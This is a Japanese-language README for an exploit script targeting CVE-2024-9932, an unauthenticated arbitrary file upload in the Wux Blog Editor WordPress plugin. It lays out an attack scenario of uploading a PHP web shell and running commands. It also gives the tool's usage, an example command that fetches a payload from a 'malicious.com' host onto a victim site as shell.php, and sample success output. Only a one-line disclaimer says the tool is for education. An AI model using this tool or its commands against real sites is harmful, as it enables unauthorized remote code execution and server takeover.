
Wux Blog Editor WordPress プラグインは、wuxbt_insertImageNew 関数におけるファイルタイプ検証の不備により、任意のファイルアップロードに対して脆弱です。影響を受けるバージョンは 3.0.0 までです。この脆弱性により、認証されていない攻撃者がサーバーに任意のファイルをアップロードでき、リモートコード実行 (RCE) につながる可能性があります。
この脆弱性は、wuxbt_insertImageNew 関数における不適切なファイルタイプ検証に起因します。これにより、攻撃者は認証なしで悪意のあるファイルをサーバーにアップロードできます。
攻撃シナリオ:
攻撃者は、脆弱なプラグインを使用している Web サイトを特定します。
ファイルアップロード機能を悪用して、悪意のある PHP シェルをアップロードします。
侵害されたサーバー上でコマンドを実行します。
usage:CVE-2024-9932.py [-h] -u URL -ur REMOTE_URL [-n NAME]
Wux Blog Editor - Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress server, e.g., http://192.168.100.74/wordpress
-ur REMOTE_URL, --remote-url REMOTE_URL
Remote file URL, e.g., http://192.168.100.54/shell.txt
-n NAME, --name NAME Desired file name, e.g., Nxploit.php
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n shell.php
アップロード成功例
1- ファイル発見:
2- 実行結果: ペイロードを実行するには、ファイルの URL にアクセスしてください。
[+] File found: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php
このツールは教育目的のみです。許可なくシステム上でこのスクリプトを不正に使用することは違法です。